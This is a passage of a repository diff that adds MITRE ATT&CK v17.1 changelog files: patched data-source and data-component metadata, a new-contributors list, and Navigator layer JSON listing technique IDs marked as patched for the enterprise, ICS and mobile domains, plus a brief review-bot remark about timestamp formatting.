Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:05.238Z", + "name": "Scheduled Job", + "description": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Windows", + "macOS", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:05.238Z\", \"old_value\": \"2025-04-18T15:11:33.637Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0019", + "external_id": "DS0019" + }, + { + "source_name": "Microsoft Services", + "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" + }, + { + "source_name": "Linux Services Run Levels", + "description": "The Linux Foundation. (2006, January 11). 
An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.", + "url": "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:04.346Z", + "name": "Service", + "description": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:04.346Z\", \"old_value\": \"2025-04-18T15:10:47.833Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0024", + "external_id": "DS0024" + }, + { + "source_name": "Microsoft Registry", + "description": "Microsoft. (2018, May 31). Registry. 
Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:05.783Z", + "name": "Windows Registry", + "description": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:05.783Z\", \"old_value\": \"2025-04-16T20:39:08.970Z\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datacomponents": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:55.892Z", + "name": "Device Alarm", + "description": "This includes alarms associated with unexpected device functions, such as shutdowns, restarts, failures, or configuration changes", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:55.892Z\", \"old_value\": \"2025-04-16T21:26:36.998Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:59.118Z", + "name": "Logon Session Metadata", + "description": "Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:59.118Z\", \"old_value\": \"2025-04-18T15:12:23.075Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": 
"2025-04-25T14:39:54.996Z", + "name": "Process History/Live Data", + "description": "This includes any data stores that maintain historical or real-time events and telemetry recorded from various sensors or devices", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:54.996Z\", \"old_value\": \"2025-04-16T21:26:36.842Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:52.496Z", + "name": "Process/Event Alarm", + "description": "This includes a list of any process alarms or alerts produced to indicate unusual or concerning activity within the operational process (e.g., increased temperature/pressure)", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:52.496Z\", \"old_value\": \"2025-04-16T21:26:36.694Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": 
"x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:56.271Z", + "name": "Scheduled Job Metadata", + "description": "Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:56.271Z\", \"old_value\": \"2025-04-18T15:11:39.543Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:52.137Z", + "name": "Service Metadata", + "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": 
false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:52.137Z\", \"old_value\": \"2025-04-18T15:10:51.004Z\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + } + }, + "new-contributors": [ + "Daniel Acevedo, ARMADO", + "Edward Stevens, BT Security", + "Fl\u00e1vio Costa, @Seguran\u00e7a Descomplicada", + "Hannah S", + "Matt Brenton, Zurich Global Information Security", + "Michael Davis, ServiceNow Threat Intelligence", + "Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd", + "Prinesha Dobariya", + "Purinut Wongwaiwuttiguldej", + "Raghvendra Mishra, Arista Networks", + "SeungYoul Yoo, Ahn Lab", + "The DFIR Report", + "Vlad Shumaher, Palo Alto Networks" + ] +} \ No newline at end of file diff --git a/modules/resources/docs/changelogs/v17.0-v17.1/layer-enterprise.json b/modules/resources/docs/changelogs/v17.0-v17.1/layer-enterprise.json new file mode 100644 index 00000000000..6975fe4b431 --- /dev/null +++ b/modules/resources/docs/changelogs/v17.0-v17.1/layer-enterprise.json 
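Review bot: the course-of-action entries in this hunk serialize `created` and `modified` as `"2019-06-06 20:15:34.146000+00:00"` (space separator, numeric offset) while the x-mitre-data-source and x-mitre-data-component entries use the STIX form `"2021-10-20T15:05:19.272Z"`, and the same split is carried into the `detailed_diff` strings (`"new_value": "2025-04-25 14:39:15.463000+00:00"` versus `"new_value": "2025-04-25T14:40:03.068Z"`). That pattern suggests the changelog generator is stringifying parsed datetime objects for one object type and passing the raw STIX string through for the others; normalizing to a single format before the JSON is written would keep consumers that diff these files across releases from reporting identical timestamps as changes. Separately, the file is committed without a trailing newline (`\ No newline at end of file`); adding one avoids a spurious diff the next time the changelog is regenerated.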
@@ -0,0 +1,706 @@ +{ + "versions": { + "layer": "4.5", + "navigator": "5.0.0", + "attack": "17.1" + }, + "name": "May 2025 Enterprise Updates", + "description": "Enterprise updates for the May 2025 release of ATT&CK", + "domain": "enterprise-attack", + "techniques": [ + { + "techniqueID": "T1546.011", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1546.011", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.004", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.004", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1102.002", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1027.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1185", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.012", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.012", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.012", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1559.001", + "tactic": "execution", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1218.002", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1568.003", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + 
{ + "techniqueID": "T1102.001", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1491", + "tactic": "impact", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1600.002", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1090.004", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1601.002", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1568", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.011", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.011", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1008", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1568.001", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1558.001", + "tactic": "credential-access", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1564.005", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1564.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1176.002", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1219.001", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, 
+ { + "techniqueID": "T1505.004", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1525", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1218.004", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1016.001", + "tactic": "discovery", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1114.001", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1204.004", + "tactic": "execution", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1204.003", + "tactic": "execution", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1601", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1218.005", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1104", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1599.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1602.002", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1132.002", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1218.008", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1102.003", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1601.001", + 
"tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1120", + "tactic": "discovery", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1205.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1205.001", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1205.001", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.002", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.002", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.009", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.009", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1564.010", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.013", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.013", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1090", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.008", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.008", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": 
"T1542.004", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1542.004", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1600.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1218.009", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1219.003", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1578.004", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1207", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1134.005", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1134.005", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1602.001", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1562.009", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1547.005", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1547.005", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.010", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.010", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": 
"T1574.010", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1558.002", + "tactic": "credential-access", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1036.006", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1001.002", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1548.003", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1548.003", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1614.001", + "tactic": "discovery", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1542.005", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1542.005", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1221", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.003", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.003", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.005", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.005", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1505.002", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": 
"T1546.005", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1546.005", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1564.007", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1125", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1600", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + } + ], + "sorting": 0, + "hideDisabled": false, + "legendItems": [ + { + "color": "#a1d99b", + "label": "additions: ATT&CK objects which are only present in the new release." + }, + { + "color": "#fcf3a2", + "label": "major_version_changes: ATT&CK objects that have a major version change. (e.g. 1.0 \u2192 2.0)" + }, + { + "color": "#c7c4e0", + "label": "minor_version_changes: ATT&CK objects that have a minor version change. (e.g. 1.0 \u2192 1.1)" + }, + { + "color": "#B5E5CF", + "label": "other_version_changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 \u2192 1.2)" + }, + { + "color": "#B99095", + "label": "patches: ATT&CK objects that have been patched while keeping the version the same. (e.g., 1.0 \u2192 1.0 but something like a typo, a URL, or some metadata was fixed)" + }, + { + "color": "#ff9000", + "label": "revocations: ATT&CK objects which are revoked by a different object." + }, + { + "color": "#ff6363", + "label": "deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced." + }, + { + "color": "#ff00e1", + "label": "deletions: ATT&CK objects which are no longer found in the STIX data." + }, + { + "color": "#ffffff", + "label": "unchanged: ATT&CK objects which did not change between the two versions." 
+ } + ], + "showTacticRowBackground": true, + "tacticRowBackground": "#205b8f", + "selectTechniquesAcrossTactics": true +} \ No newline at end of file diff --git a/modules/resources/docs/changelogs/v17.0-v17.1/layer-ics.json b/modules/resources/docs/changelogs/v17.0-v17.1/layer-ics.json new file mode 100644 index 00000000000..12bd52dda32 --- /dev/null +++ b/modules/resources/docs/changelogs/v17.0-v17.1/layer-ics.json 
@@ -0,0 +1,104 @@ +{ + "versions": { + "layer": "4.5", + "navigator": "5.0.0", + "attack": "17.1" + }, + "name": "May 2025 ICS Updates", + "description": "ICS updates for the May 2025 release of ATT&CK", + "domain": "ics-attack", + "techniques": [ + { + "techniqueID": "T0800", + "tactic": "inhibit-response-function", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0872", + "tactic": "evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0801", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0845", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0852", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0869", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0882", + "tactic": "impact", + "enabled": true, + "color": "#B99095", + "comment": "patche" + } + ], + "sorting": 0, + "hideDisabled": false, + "legendItems": [ + { + "color": "#a1d99b", + "label": "additions: ATT&CK objects which are only present in the new release." + }, + { + "color": "#fcf3a2", + "label": "major_version_changes: ATT&CK objects that have a major version change. (e.g. 1.0 \u2192 2.0)" + }, + { + "color": "#c7c4e0", + "label": "minor_version_changes: ATT&CK objects that have a minor version change. (e.g. 1.0 \u2192 1.1)" + }, + { + "color": "#B5E5CF", + "label": "other_version_changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 \u2192 1.2)" + }, + { + "color": "#B99095", + "label": "patches: ATT&CK objects that have been patched while keeping the version the same. 
(e.g., 1.0 \u2192 1.0 but something like a typo, a URL, or some metadata was fixed)" + }, + { + "color": "#ff9000", + "label": "revocations: ATT&CK objects which are revoked by a different object." + }, + { + "color": "#ff6363", + "label": "deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced." + }, + { + "color": "#ff00e1", + "label": "deletions: ATT&CK objects which are no longer found in the STIX data." + }, + { + "color": "#ffffff", + "label": "unchanged: ATT&CK objects which did not change between the two versions." + } + ], + "showTacticRowBackground": true, + "tacticRowBackground": "#205b8f", + "selectTechniquesAcrossTactics": true +} \ No newline at end of file diff --git a/modules/resources/docs/changelogs/v17.0-v17.1/layer-mobile.json b/modules/resources/docs/changelogs/v17.0-v17.1/layer-mobile.json new file mode 100644 index 00000000000..e46fa4737cc --- /dev/null +++ b/modules/resources/docs/changelogs/v17.0-v17.1/layer-mobile.json 
@@ -0,0 +1,83 @@ +{ + "versions": { + "layer": "4.5", + "navigator": "5.0.0", + "attack": "17.1" + }, + "name": "May 2025 Mobile Updates", + "description": "Mobile updates for the May 2025 release of ATT&CK", + "domain": "mobile-attack", + "techniques": [ + { + "techniqueID": "T1577", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1617", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1603", + "tactic": "execution", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1603", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + } + ], + "sorting": 0, + "hideDisabled": false, + "legendItems": [ + { + "color": "#a1d99b", + "label": "additions: ATT&CK objects which are only present in the new release." + }, + { + "color": "#fcf3a2", + "label": "major_version_changes: ATT&CK objects that have a major version change. (e.g. 1.0 \u2192 2.0)" + }, + { + "color": "#c7c4e0", + "label": "minor_version_changes: ATT&CK objects that have a minor version change. (e.g. 1.0 \u2192 1.1)" + }, + { + "color": "#B5E5CF", + "label": "other_version_changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 \u2192 1.2)" + }, + { 